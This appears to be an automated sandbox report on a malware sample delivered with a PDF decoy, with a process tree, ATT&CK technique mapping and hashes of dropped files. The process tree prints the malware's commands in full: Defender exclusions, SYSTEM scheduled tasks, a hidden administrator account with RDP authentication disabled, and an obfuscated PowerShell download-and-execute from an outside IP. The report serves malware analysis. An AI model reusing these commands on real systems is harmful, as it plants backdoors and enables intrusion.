        System Location Discovery: System Language Discovery
        
        PID:1988
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F2F9C2698926B406CA5ACAB0C94AC598 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3856
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\scheduler-once.bat"
    3⤵
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4736
  - - C:\Windows\system32\schtasks.exe
      schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM" /f
      4⤵
      PID:3628
  - - C:\Windows\system32\schtasks.exe
      schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM" /f
      4⤵
      PID:1056
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM" /tr "C:\Windows\System32\sysmon2.bat" /ru "SYSTEM" /sc ONSTART /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2728
  - - C:\Windows\system32\schtasks.exe
      schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM"
      4⤵
      PID:5060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1460
  - - C:\Windows\system32\ipconfig.exe
      "C:\Windows\system32\ipconfig.exe" /all
      4⤵
      Gathers network information
      PID:1596

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Windows\system32\schtasks.exe
  schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM2" /f
  2⤵
  PID:8
- C:\Windows\system32\schtasks.exe
  schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM2" /f
  2⤵
  PID:4664
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM2" /tr "C:\Windows\System32\sysmon.bat" /ru "SYSTEM" /sc MINUTE /mo 5 /rl HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1548
- C:\Windows\system32\schtasks.exe
  schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM2"
  2⤵
  PID:1812

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4084
- C:\Windows\system32\net.exe
  net user _BootUEFI_ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user _BootUEFI_ /add
    3⤵
    PID:468
- C:\Windows\system32\net.exe
  net user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"
    3⤵
    PID:2204
- C:\Windows\system32\net.exe
  net localgroup Administrators _BootUEFI_ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrators _BootUEFI_ /add
    3⤵
    PID:1828
- C:\Windows\system32\net.exe
  net localgroup "Remote Desktop Users" /add
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - Suspicious use of WriteProcessMemory
  PID:1364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup "Remote Desktop Users" /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2456
- C:\Windows\system32\net.exe
  net localgroup "Remote Desktop Users" _BootUEFI_ /add
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - Suspicious use of WriteProcessMemory
  PID:4128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup "Remote Desktop Users" _BootUEFI_ /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:4252
- C:\Windows\system32\net.exe
  net localgroup "Users" _BootUEFI_ /delete
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - Suspicious use of WriteProcessMemory
  PID:4232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup "Users" _BootUEFI_ /delete
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:4228
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  2⤵
  PID:3004
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\Client" /v fClientDisableUDP /t REG_DWORD /d 1 /f
  2⤵
  PID:3408
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v _BootUEFI_ /t REG_DWORD /d 0 /f
  2⤵
  - Hide Artifacts: Hidden Users
  PID:3940
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
  2⤵
  - Modifies data under HKEY_USERS
  PID:2768
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
  2⤵
  PID:872
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  2⤵
  PID:3192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ep bypass -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  PID:264
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "[string] $a = {(eliasneliaseeliasw-eliasObeliasjeeliasct neeliast.weliasebeliasCleliasient).eliasdeliasoeliaswnleliasoeliasaeliasdSeliastreliasieliasneliasg('eliasheliasteliasteliasp:eliaselias/eliaselias/1elias54.9elias0.6elias2.24elias8/wHk4tMu9XpWA/eliasaelias.eliaspeliaseliasselias1eliaselias')}; $b=$a.replace('elias','');$c=iex $b;iex $c"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4620

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
015c0e9b02185baabccf5ce81c1a7702

SHA1
ba977d1b0c0b4abf9db43891e098d19836bbd455

SHA256
dbc2d10ca757564e1c5b47526e229f4555a4e73e31f1cd43512996f543d4ad99

SHA512
646769359334ff5a2bb61be9c2b136eb2b5fe7c5f3270bc966fd336846f45d01344f4a6d5cbb74b20466066fedf21ea485f22c3d1750f4c850599ddc72adadc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1616a7b9e287ddc77d1df61d1b64afce

SHA1
cd991d366dfcf29ce19bf7e2adb21567d8431d5e

SHA256
b903f0444ed3fe41a98f57bf40f98c9708bd2f7a210d598cfefd55ffbc5c86a4

SHA512
43f989e05fbdc4585b9c0da5b94e48ddbeb26511e997a86f4860be4280709ea7473d74d13dcf328b3cc5ce685d591308ac7c9c4561a2ffa75a504986aed54816

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Report_Estimiation_SKT_20241112472075939.pdf

Filesize
474KB

MD5
ac71b12197e142df7560b5e943db6d76

SHA1
d5175f5d1a88883739bde929f07a3e3ca364195a

SHA256
3de2bbab33eb3d4b0b6ba03c6951bbccdd4f141916f4ea43f9bb195d67a98a7f

SHA512
de0370a53adfcefbedab09613f0e758195de5348f00d63a287a599a26496e372ade90e9c55624f99bfba7314b56573d2eb4c41b3c2aeda6f57392e40922f2afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jrv4u1ah.pu1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\k1.bat

Filesize
1KB

MD5
5c9f358175096711a267c17e746390b0

SHA1
128cd0e49b74583d33f224362b2381686739fea7

SHA256
33675909e13fd3378b390d5bf3fb31b094a291223bf2735fe79e8751d61f2f04

SHA512
5392fd524121d76e43fad750581871589655ec5bba56d875c85e2a884a3d2fc1c11b818131ebde34e402dd436a47188d074959d6b6c8632ff227a5692f212510

Download Submit
C:\Users\Admin\AppData\Local\Temp\k2.bat

Filesize
358B

MD5
73ee484b95ae517d099384e0b5f2255a

SHA1
4b7c89b03aa4c57267e041b3a8356bdd5490b2aa

SHA256
fb26e69770508af54bb2755f916859f2c912eaae7b8fe83f163f4450b3f34e92

SHA512
d84cb995fcbe214efa1bd9e236dfc3b9530780aa670ad30b5156d62b1659745dd8d6fbe438297aed58517a2fa1bcb987f203c100bb3477cf7efe4f867a8a342d

Download Submit
C:\Users\Admin\AppData\Local\Temp\scheduler-once.bat

Filesize
758B

MD5
fb201872c7fe90f79e250805f0b9f998

SHA1
e79d432eb71986227814e9b3de4a42d1df1aa418

SHA256
75c075cf9d9a7dba88a2ad74df1dd6f92c4033063eac3f66034831a1a049f1ef

SHA512
9927f60456f285b94e8349bc2f1d5c1f145c8ea590fa2d180108bc0f8872b7640ec15cf6837c1458c557b9b9ad325f5787385ab3687d5ff407110c67a57ccff4

Download Submit
C:\Users\Public\documents\id.log

Filesize
78B

MD5
6c77eedf231eb940fe041760e7364b8c

SHA1
354377b831a9ea4594d66131cf7e50bc2c83a42f

SHA256
4761a903e787f58c99587291b5c6c5b234a3e03f457e56c5c93386f0e5a9d15e

SHA512
34fa6699c364de43b25c027e47e27b9afaef3f15f34659a49fe11f6b52559dd846c46a46fe5d2390d6c4898081685ec1603c754cf2a56ae32e96eebe05ae9e01

Download Submit
memory/1460-105-0x000001EE376F0000-0x000001EE37714000-memory.dmp

Filesize
144KB

Download
memory/1460-104-0x000001EE376F0000-0x000001EE3771A000-memory.dmp

Filesize
168KB

Download
memory/4160-91-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp

Filesize
10.8MB

Download
memory/4160-90-0x00007FFC5D9F3000-0x00007FFC5D9F5000-memory.dmp

Filesize
8KB

Download
memory/4160-50-0x000001B857290000-0x000001B85749A000-memory.dmp

Filesize
2.0MB

Download
memory/4160-2-0x00007FFC5D9F3000-0x00007FFC5D9F5000-memory.dmp

Filesize
8KB

Download
memory/4160-122-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp

Filesize
10.8MB

Download
memory/4160-48-0x000001B856F00000-0x000001B857076000-memory.dmp

Filesize
1.5MB

Download
memory/4160-13-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp

Filesize
10.8MB

Download
memory/4160-8-0x000001B854820000-0x000001B854842000-memory.dmp

Filesize
136KB

Download
memory/4160-14-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp

Filesize
10.8MB

Download
memory/4620-115-0x00000209F3F20000-0x00000209F3F3C000-memory.dmp

Filesize
112KB

Download
memory/4620-116-0x00000209F3F40000-0x00000209F3FF5000-memory.dmp

Filesize
724KB

Download
memory/4620-117-0x00000209F4000000-0x00000209F400A000-memory.dmp

Filesize
40KB

Download
memory/4620-123-0x00000209F4030000-0x00000209F404C000-memory.dmp

Filesize
112KB

Download